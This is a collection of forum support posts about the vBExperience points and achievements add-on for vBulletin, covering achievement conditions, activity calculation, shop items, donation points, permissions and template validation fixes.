I want to make a monthly contest, where users with the most achieved points in the definite period can get some prizes. So is there a feature to do something like that? :)

Or - can I make the requirements for the award meet more than one condition? I need AND conditions - not OR.

For example... I want a one year, two year, three year award, etc... When the three year award hits, the two year should drop off? (1 year = More than 365 days AND less than 730) Calculated in points, of course...

You mean achievements? Awards are summed together, you cannot define conditions.
And yes, you can add multiple conditions for one achievement. And no, you cannot combine them.

(example) If the system gives 1 point per thread and 1 per post... in the end, the user has 85 points for that thread, but if I delete it, the user lost his points...

A Gift cannot be selled.

Give Away Points is just like donating points to someone other.

You have 250k EXPERIENCE points, not custom, I guess...

vbxperience needs postcount for calculating points and stuff (I guess)
So, if postcount doesn't decrease, activity won't be affected.

vBExperience 3.8.6 is currently in development. It incorporates the unfinished 3.8.5 features and also some of the vBExperience 4.0.

The permission is bound to the memberlist, as similar data is beeing displayed. Open the memberlist for unregistered usergroup.

Yes, you need to edit the permissions via Usergroup Manager:
- AdminCP
- Usergroups
- Usergroup Manager
- "Unregistered / Not Logged In" -> Edit

Change this:
- Can View Member Info
- Can View Forum
to "Yes"

- Save!

Some old threads with, an example, 1000 posts, must be deleted, so al points earned are deleted :(

Phalynx, I noticed that its not usefull without second group long ago, but also does ask about that, because I thought that its so clearly that it need for promotion and its already at you todo list... I do not know how user use promotions without that... All of my members at default usergroup and only when I want to give them additational permisions I put them to additational usergroups. pretty simple. no need to control over to much usergroup access and settings.

Note: secondary usergroups was not usefull in latest vbulletin realises, but Additional Usergroups is very-very userfull feature.

The main reason: When you use primary group only, when you create a new one:
* you need to control and correct setting of all forums permisions on your board, becasue by default private forums is allowed to access for new usergroup. if its many forums with not default setting - its a big work you you to control and correct setting when you add new forums or add usergorup.
* hard to correct usergroup setting and compare that new usergroup have no less permissions every time [/B] when you change setting for general usergroup (for ex. registered users changed default avatar size from 50x50 to 100x100) after that you must go and correct other usergroups: Uploaders, VIP, etc. etc. and give them 100x100 also! bad..... unnecessary movements!!!

when you use additational usergroup you can simple dissalow all for new usergroup, avator size set to 0/0 ( settings will be used from primary usergroup) and give only additational permissions only. maybe change attachments size more that primary usergroup have and its will work...
with additational usergroup you can not give less permissions for primary, only additational :) its fully reflects concept of promotional system and must used to promotions

* Third, you can put "Registered users" not to one usergroup (like primary usergroup change allowed) but you members can be Uploaded, Vip member, Customer etc. at the same time!

Avoiding the use of custom points you only have the possibility to create an extra field and add it to the calculation using the CDP Plugin Interface.

Take a look at ZIP\extras\Custom Data Provider\product_vbexperience_cdp_example.xml
Modify that file to your needs, e.g. add your points with xperience_calcdata and import it.

If you are not familiar with PHP then I don't have a fast solution for you.

LDM is a plugin that needs to be imported to an existing product. Import it as plugin, not as a product.

Just edit xperience_award_showcase and/or xperience_achievements_showcase template. Add a div tag then set the width of award/archivement box.

As soon as you install the plugin it checks all downloads against a purchase in the shop.

I think you misunderstood this. LDM is supported without a plugin. The LDM Plugin just checks if a download has been purchased.

No, there is no way to do this. With vBExperience 4.1 there will be a way to do it, but 4.1 will be available for vBulletin 4.x only.

Please check if the cron is running. Run also a manually recount to check if the points are collected correctly.

However, something is still going on with the tabs and blocks. For instance, when I enable the video directory mod, the video directory block HTML is inserted inside the HTML for the video-directory blocks:

vBCredits and vBexperience are two different things. That's why there's an add-on that lets you integrates the two. vBCredits is a points mod. vBExperience is a way to reward and keep track of forum usage.

Also, this mod was updated in May of this year. And the first post has an announcement saying that development began anew this August.

No, there is no such option to do that.

The WoW Level is a special level file, I would just use a smaller one.

Also, the activity does not depend on the level file. Did you modified the "Timeframe for Activity"?

Did you try uploading all your files one at a time, because it sounds like you misplaced one. You should upload all your files at one time matching your forum's file directory setup.

Not the friendliest uninstall ever. Had to get rid of this due to a mass of "Deprecated:" as host upgraded the PHP version.

I actually upgraded to the latest one and followed the uninstall instruction by instruction.

My users were left with this notice when trying to post.

First of all, thanks to the author of this addon, is fantastic!! I have installed it in my forum and works fine. But I have two questions:

1. When an user receives an item from another user, he can´t send this item to another user. Why? I need that users have the ability to transfer all kind of items several times, including those that have received from another users.

2. When an user sell back one item to the shop, they always receive only 1 point. I have set a ratio of 50%, but never works. Why?

Please help me, I have to resolve this two points to make vbexperience work on my site.

Mine has over 20 million... querying it takes seconds... it does affect performance. My guess is it only matters if the user hasn't logged in/been active for a while or if you need to recalculate it. In either case, I am backing it up and pruning it.

This will replace the internal vB promotions. If you enable this system, make sure that you delete any promotions that could collide with Experience. I'd like to change the 10 Days Registered achievement to '365 Days registered'. I'm confused however that the default 'value' for 10 days is '20'. Can you explain?

I've also noted that on some of my members, an Achievement icon for '10 Days' and 'First 100 XP' is showing twice...!

Oh, and is the 'radioactivity' plugin (.xml) in the zip? I can't see it.

This is getting more and more confusing by the minute:

When setting the parameters for Achievements, what's the difference between 'Posts' and Points for Posts'? :confused:

Clearly, something is adrift because I used the value 2000 for 'Posts' (x2 points each on my board) and a member with 800 posts got the achievement (should be 1000+ posts). I then changed the achievement to 2000 'Points for Posts' and again the same member was credited with a 1000 post achievement.

Finally - is there a way to exclude Admins from showing Achievement icons? I've excluded the Admin Group from calculations; the bars have gone but the icons still show.

The development of 3.8.6 does not include added features to the shop. However, there is a plugin already available called "download_files_shop_ldm.xml" (Download files with vBExperience as a credit system ("LDM Links and Downloads Manager", "DownloadsII"))

Two questions:

- I'm a few updates behind (I think I'm on 3.8.4.2). I'm nervous about installing the latest patches (i.e. 'if it aint broke, don't fix it...'). Is there anything that might break if I get the latest version? I have a lot of items in the shop, but I haven't changed anything using the cdp.

I installed 3.8.4.3 and it went very smoothly - just changed the one file per the instructions that came with it.

Regarding the PayPal donate feature, it looks like it is working for the most part, but can you confirm two things about the way it calculates PayPal Donate points?

- does it only calculate the donation points after the donation has been "confirmed"?

- How do you calculate the donation points? Do you mulitply the number of points by the dollar amount they donate? e.g. I've set "Points that are added for amounts that has been donated via Hack "Cyb - PayPal Donate"" equal to 70. I then tested by donating $2 and was awareded 140 points. I thought it would be a flat 70 points per donation but it seemed to multiply it by the number of dollars.

That's right, with 3.8.4 I changed the location to /xperience. You need to use "redirect" the path, there is no setting for that.

The following explanation of how activity is computed isn't very clear:

"The system calculates the activity by taking the average post count/visitormessages/group discussion/Blog entries of the ten most active user and comparing it to own post count. This can be set to count only the last X days, f.e. 21 days."

Currently our "Timeframe for Activity" is set to 21 days.

This is how I imagine (incorrectly I'm sure) activity percentages are computed:

1) The activity count is based on posts, visitor messages, group discussions, and blog entries. Correct?
2) You find the 10 most active users based on activity count from the last 21 days. Correct?
3) How then is the average post per day (PPD) calculated? Each of the 10 most active users will have their own PPD over the 21 days. What do you do with these 10 individual PPD's. Take the average of the averages?
4) The activity percent for a given user is then computed by calculating his activity count over 21 days and then comparing this number with the count computed in step 3. Correct?

I think a more detailed explanation of how activity is calculated will help answer a lot of questions posters have, like "why do does everyone have 99.9% activity?".

It is the 3rd step that really needs a better explanation. I know there is no PPD available. How exactly it is calculated is where I'm confused. Here's an example.

Total counts over last 21 days for top 10 active users:

user A: 175 counts (8.3333 PPD)
user B: 170 counts (8.0952 PPD)
user C: 165 counts (7.8571 PPD)
user D: 165 counts (7.8571 PPD)
user E: 160 counts (7.6190 PPD)
user F: 160 counts (7.6190 PPD)
user G: 150 counts (7.1429 PPD)
user H: 155 counts (7.3810 PPD)
user I: 145 counts (6.9048 PPD)

Total count = 1545
PPD = 7.3571 (which is the average posts per day of the top 10 active users).

Based on this wouldn't user A have an active percent of 113.3% = 100 *8.3333 / 7.3571?

The reason I want to know the gory details is because when I changed the timeframe from 60 days to 21 days the activity percents changed considerably. What would cause this? An average taken over 21 days compared to 60 days shouldn't make a big difference.

Thats right. 113% are for simplicity corrected to 100%, 112% to 99.9%.....

I'm not sure how it got set to 60 days, I just assumed that was the default. Is the default/recommended setting 21 days?

Since 3.8.6 may not be released, can you share if there were major fixes? I don't care about more features or anything, just the fixes.

I'm getting the validation errors (as mentioned by others) with the double border="0" and missing alt tags. Can someone tell me where to fix those validation errors?

Actually, I'm very surprised that more aren't concerned about the validation errors. Each icon kicks back 2 validation errors, so if you have a page with many posts and each member has 6 icons or so, that could lead to loads of validation errors. For example, this page from one of the demos http://www.insidetwoworlds.com/showthread.php?t=33271 shows 497 validation errors through http://validator.w3.org/ That is a lot of coding errors for one page.

So sorry to be so annoying, but what about the validation errors? I just need to know which template to work on. I am not asking you to update the files or anything. If I need to adjust many files, I am fine with that. I've spent 2 days trying to figure it out and removing border="0" from each template, and I seriously can't find where to fix the issues. Each icon in postbit is throwing up a duplicate border="0" error and a missing alt error.

I know we can be annoying with requests and such, and I wouldn't care much if it were just a couple errors on each page, but it adds up to a lot of errors on the showthread pages, which is where all of my content is.

*Found the errors in the functions_xperience.php . It was a very easy fix once I found the file. I'm not a coder/programmer so didn't realize it would be literally on the same line. Too funny.

Here's the file I altered. It's in the includes folder on the root. Once the alt attributes were added and the double border attributes removed, my thread pages pass validation.

Hello, great mod! The only problem I have is that the achievements aren't displayed in memberinfo or postbit (if you go to the achievements page, it does says what achivements you "deserve"). I've tried all the options and mantainance tools that you have, even some modifications provided in this thread.

One time I could get the achievements to show but only in some users. There is any cache? Please let me know what can I try.

Over the years, my members have reported a bug that still exists:
When an award is issues or removed, they get a notification. After clicking on the notification, it never goes away anymore.

I installed this mod to try it out whether I like it or not and I'm currently only trying out Achievements. There seems to be a problem. In my admin CP, I made PayPal donation 1 point.

I created the achievement of a 'Donor' with the condition of ''PayPal Donate > 5'', but it doesn't work like I wanted to. Only six out of 36 donators get this achievement. When I go to Quick Links > Experience > Achievements, it says:

Users achieved this: 6
Requirements:
PayPal Donate > 5 (You have 5)

Yet the user doesn't have the achievement. How can I fix this?
